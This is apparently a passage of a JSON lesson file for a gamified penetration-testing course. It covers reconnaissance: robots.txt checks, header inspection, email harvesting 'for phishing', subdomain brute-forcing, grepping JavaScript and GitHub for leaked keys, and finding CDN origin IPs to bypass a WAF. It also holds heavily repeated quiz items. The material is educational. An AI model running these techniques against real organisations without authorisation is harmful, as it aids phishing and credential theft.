IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-robots","cat":"Reconnaissance","title":"robots.txt Analysis","diff":1,"xp":50,"intro":"Sites tell crawlers what to avoid.","sections":[{"type":"text","content":"robots.txt lists paths hidden from search engines \u2014 good recon targets."},{"type":"code","lang":"bash","content":"curl -s https://target.com/robots.txt\ncurl -s https://target.com/sitemap.xml"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"robots.txt is meant for...","opts":["Hackers","Search engine crawlers","Users","Firewalls"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-http-headers","cat":"Reconnaissance","title":"HTTP Header Recon","diff":1,"xp":75,"intro":"Response headers leak technology info.","sections":[{"type":"text","content":"Headers reveal: Server version, X-Powered-By, missing security headers."},{"type":"code","lang":"bash","content":"curl -I https://target.com\n# Look for: Server, X-Powered-By, missing CSP/HSTS"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"X-Powered-By reveals...","opts":["User info","Backend technology","DNS config","SSL version"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-email-harvest","cat":"Reconnaissance","title":"Email Harvesting","diff":1,"xp":75,"intro":"Collect emails for phishing.","sections":[{"type":"text","content":"theHarvester, hunter.io, and Google dorks find email addresses."},{"type":"code","lang":"bash","content":"theHarvester -d target.com -b google,bing\nhunter.io"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Email format helps predict...","opts":["Passwords","Other employees' email addresses","Server IPs","Vulnerabilities"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-metadata","cat":"Reconnaissance","title":"Document Metadata","diff":1,"xp":75,"intro":"PDFs and docs contain hidden info.","sections":[{"type":"text","content":"EXIF data reveals: author, software, GPS, internal usernames."},{"type":"code","lang":"bash","content":"exiftool document.pdf\nmetagoofil -d target.com -t pdf,doc"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Document metadata reveals...","opts":["Vulnerabilities","Author names, software, GPS coordinates","Passwords","Network topology"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-vhost","cat":"Reconnaissance","title":"Virtual Host Discovery","diff":2,"xp":150,"intro":"Find hidden sites on the same IP.","sections":[{"type":"text","content":"Fuzz the Host header to find sites not in DNS."},{"type":"code","lang":"bash","content":"ffuf -u http://target -H 'Host: FUZZ.target.com' -w wordlist.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Virtual hosts differ by...","opts":["IP","Host header","Port","Protocol"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-dns-brute","cat":"Reconnaissance","title":"Subdomain Brute Force","diff":2,"xp":150,"intro":"Try millions of subdomain names.","sections":[{"type":"text","content":"Active brute-forcing against DNS to find hidden subdomains."},{"type":"code","lang":"bash","content":"gobuster dns -d target.com -w subdomains-top1mil.txt\namass enum -brute -d target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Subdomain brute forcing is...","opts":["Passive","Active recon","OSINT","Social engineering"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-js-secrets","cat":"Reconnaissance","title":"JavaScript Secret Mining","diff":2,"xp":150,"intro":"Client-side JS leaks endpoints and keys.","sections":[{"type":"text","content":"Download JS files and grep for API keys, tokens, and internal URLs."},{"type":"code","lang":"bash","content":"curl target.com | grep -oP 'src=\"[^\"]+.js'\n# Search each for secrets\ngrep -oiE '(api_key|token|secret)=[^s]+' app.js"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"JS files commonly leak...","opts":["Nothing","API keys and internal endpoints","Passwords","Source code"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-github","cat":"Reconnaissance","title":"GitHub Reconnaissance","diff":2,"xp":150,"intro":"Mine repos for secrets.","sections":[{"type":"text","content":"Public repos leak API keys, credentials, and architecture."},{"type":"code","lang":"bash","content":"trufflehog github --org targetcorp\ngitrob -org targetcorp"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"GitHub repos leak secrets because devs...","opts":["Use encryption","Accidentally commit credentials","Share intentionally","Use strong passwords"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-cdn-origin","cat":"Reconnaissance","title":"CDN Origin Discovery","diff":2,"xp":150,"intro":"Find the real IP behind a CDN.","sections":[{"type":"text","content":"CDNs hide origin IPs. Find them via historical DNS, cert search, or Shodan."},{"type":"code","lang":"bash","content":"# Historical DNS\nsecuritytrails.com\n# Search by SSL cert\ncensys search 'services.tls.certificates.leaf.subject.common_name:target.com'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Finding the origin IP lets you...","opts":["Browse faster","Bypass WAF by connecting directly","Spoof DNS","Send email"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability 